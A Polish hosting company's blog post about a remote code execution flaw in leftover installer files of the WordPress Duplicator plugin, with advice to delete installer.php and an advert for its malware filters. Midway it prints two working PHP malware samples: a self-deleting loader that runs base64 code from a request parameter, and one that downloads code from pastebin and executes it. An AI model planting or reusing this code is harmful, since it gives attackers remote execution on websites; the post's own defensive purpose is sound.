Podatność we wtyczce Duplicator WP
W popularnej wtyczce WordPress służącej do migracji/kopii zapasowej – Duplicator wykryto podatność na zdalne wykonanie kodu na serwerze (Remote Code Execution), która pozwala zmodyfikować plik wp-config.php i wprowadzić tam złośliwy kod PHP.
Co ważne: Podatność w tym przypadku nie występuje w samym katalogu wtyczki Duplicator. Usterka ujawnia się podczas używania wtyczki Duplicator do migracji lub przywracania kopii zapasowej witryny WordPress.
Podatność znajduje się w plikach instalatora migracji – dlatego istotne jest aby usunąć je zaraz po przeprowadzeniu 'Restore’ z kopii zapasowej, gdyż wspomniane zdalne wykonanie kodu jest możliwe właśnie dzięki nieumyślnemu pozostawieniu plików po-instalacyjnych na serwerze. Jeśli wykonamy wdrożenie z kopii migracyjnej – pliki te należy usunąć.
Opis i dowód podatności:
Więcej o śledztwie i dowodzie podatności można przeczytać (tekst w jęz. angielskim) w dokumencie, który przygotował synacktiv.com
WordPress_Duplicator-1.2.40-RCE
Aby jednak wyeliminować ryzyko ataku, możesz sprawdzić folder główny swojej witryny i usunąć plik installer.php. To nie jest istotny plik Twojej strony internetowej, to pozostałość po migracji witryny za pomocą wtyczki Duplicator.
Ważne dla bezpieczeństwa! Używając wtyczki Duplicator, pamiętajmy o usunięciu plików instalacyjnych po wykonaniu Przywrócenia (sama wtyczka nam o tym przypomni). Pozostawienie plików instalacyjnych kopii zapasowej na serwerze to poważny błąd.
A generalnie najlepszą metodą jest nie tyle co wyłączanie ale usuwanie wtyczek, których nie używamy.
wp-crawl.php
Istnieje wiele prób włamań do tej luki i powiązane z nim także nowe złośliwe oprogramowanie wp-crawl.php, które umożliwia przesłanie więcej złośliwego kodu na serwer i jego wykonanie, a następnie samoistne usunięcie siebie:
<?php @file_put_contents('tempcrawl','<?php '.base64_decode($_REQUEST['q'])); @include('tempcrawl'); @unlink('tempcrawl');
tempcrawl
<?php $c1 = "https://pastebin.com/raw/6e57ZX4p"; $b = "/tmp/dsgdhgf"; @file_put_contents($b,"<?php ".@file_get_contents($c1)); include($b);@unlink($b);
My blokujemy takie ataki!
Filtry MalwareExperts, którymi chronimy w HitMe serwery naszych klientów z powodzeniem wykrywają to zagrożenie i uniemożliwiają wykonanie złośliwego kodu.
Zachęcamy do korzystania z naszych usług hostingowych aby zwiększyć ochronę swoich stron WWW dzięki narzędziom jakie stosujemy CloudLinux, Malware Expert, imunify 360!
Czytaj więcej o wdrożonym w HitMe rozwiązaniu MalwareExperts!
Polecamy artykuł: HitMe o MalwareExperts
Śledź nas na Facebooku oraz sprawdzaj informacje tu na naszym blogu.
Dodaj komentarz